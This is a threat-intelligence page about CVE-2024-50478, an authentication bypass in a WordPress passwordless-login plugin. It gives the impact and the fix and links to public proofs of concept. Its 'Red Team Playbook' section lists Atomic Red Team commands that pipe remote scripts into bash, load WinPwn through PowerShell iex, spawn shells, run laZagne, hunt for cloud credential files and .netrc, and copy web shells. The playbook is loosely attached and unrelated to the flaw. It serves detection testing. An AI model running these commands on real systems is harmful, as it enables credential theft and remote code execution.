CVE-2024-50478
Overview
The vulnerability is an authentication bypass affecting the Swoop 1-Click Login: Passwordless Authentication plugin version 1.4.5. The root cause lies in improper validation of authentication tokens or session parameters within the plugin's login flow, which allows unauthorized access without valid credentials. This flaw specifically impacts the passwordless authentication mechanism implemented in the plugin for WordPress environments.
Vulnerability Description
Authentication Bypass by Primary Weakness vulnerability in Swoop 1-Click Login: Passwordless Authentication allows Authentication Bypass.This issue affects 1-Click Login: Passwordless Authentication: 1.4.5.
Impact
An attacker can gain unauthorized access to user accounts without valid credentials or interaction, effectively bypassing the authentication mechanism. This allows full compromise of affected user sessions, exposing sensitive data and potentially enabling further unauthorized actions within the WordPress environment. No authentication or user interaction is required to exploit the vulnerability, increasing the risk of automated or remote attacks leading to data breaches or privilege escalation.
Solution
Users of Swoop 1-Click Login: Passwordless Authentication version 1.4.5 should upgrade to the patched version as provided by the vendor. Detailed remediation instructions and patch availability are documented at Patchstack's advisory page: https://patchstack.com/database/vulnerability/swoop-password-free-authentication/wordpress-1-click-login-passwordless-authentication-plugin-1-4-5-broken-authentication-vulnerability?_s_id=cve. Applying the update will correct the authentication validation logic to prevent bypass.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the 1-Click Login: Passwordless Authentication feature in Swoop presents a significant security risk due to its authentication bypass capability. This flaw arises from a primary weakness in the implementation of passwordless login mechanisms, which are designed to streamline user access while enhancing security. However, the failure to adequately validate user identities can allow unauthorized individuals to gain access to accounts without the need for proper authentication. The specific version affected, 1.4.5, lacks the necessary safeguards to ensure that only legitimate users can initiate a session, making it susceptible to exploitation.
Attack vectors for this vulnerability are varied and can be executed with relative ease by malicious actors. One potential scenario involves an attacker leveraging social engineering tactics to trick users into clicking on a malicious link that initiates the passwordless login process. Once the attacker has access to the session token or other authentication credentials, they can impersonate the legitimate user and gain unauthorized access to sensitive information or functionalities. Additionally, automated scripts could be employed to exploit the vulnerability at scale, targeting multiple accounts in a short period, thereby increasing the potential for widespread damage.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on the affected authentication mechanism for user access. Unauthorized access could lead to data breaches, exposing sensitive customer information, intellectual property, or proprietary business data. The financial repercussions of such incidents can be significant, including regulatory fines, loss of customer trust, and potential legal liabilities. Furthermore, the reputational damage incurred from a publicized breach can have long-lasting effects on a company's market position and customer relationships, making it imperative for organizations to prioritize the resolution of this vulnerability.
Detection and mitigation strategies are crucial in addressing the risks associated with this authentication bypass vulnerability. Organizations should conduct thorough security assessments to identify instances of the affected version in their environments. Implementing robust logging and monitoring practices can help detect unusual access patterns that may indicate exploitation attempts. Additionally, organizations should consider enhancing their authentication processes by incorporating multi-factor authentication (MFA) or other advanced security measures to provide an additional layer of protection. Regular updates and patches to the affected software should also be prioritized to ensure that vulnerabilities are addressed promptly, reducing the window of opportunity for attackers.
In conclusion, the authentication bypass vulnerability in the 1-Click Login: Passwordless Authentication feature poses a critical threat to organizations utilizing this functionality. The ease of exploitation, coupled with the potential for significant real-world impact, underscores the importance of proactive security measures. By implementing effective detection and mitigation strategies, organizations can safeguard their systems against unauthorized access and protect their valuable assets from compromise.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2024-50478 vulnerability in Swoop 1-Click Login: Passwordless Authentication. While the overall EPSS score has decreased, indicating a slight reduction in broad exploit likelihood, our telemetry reveals a sharp increase in targeted detection activity, signaling that threat actors are actively probing or attempting to leverage this authentication bypass. The emergence of a new publicly available proof-of-concept exploit further lowers the barrier for adversaries, potentially accelerating weaponization and exploitation in the wild. This divergence between EPSS trends and on-the-ground activity underscores the evolving threat landscape, where focused attacker interest may not yet be fully reflected in predictive scoring models. Consequently, the risk level remains critical for organizations relying on the affected authentication mechanism, as the increased exploitation attempts heighten the probability of successful account takeover and unauthorized access incidents.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Swoopnow | 1-Click Login\ | _passwordless_authentication |
cpe:2.3:a:swoopnow:1-click_login\:_passwordless_authentication:1.4.5:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
RandomRobbieBF/CVE-2024-50478
1-Click Login: Passwordless Authentication 1.4.5 - Authentication Bypass via Account Takeover
|
RandomRobbieBF | 0 | 0 | 2024-11-05 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50478 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/swoop-password-free-authentication/wordpress-1-click-login-passwordless-authentication-plugin-1-4-5-broken-authentication-vulnerability?_s_id=cve |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/swoop-password-free-authentication/vulnerability/wordpress-1-click-login-passwordless-authentication-plugin-1-4-5-broken-authentication-vulnerability?_s_id=cve |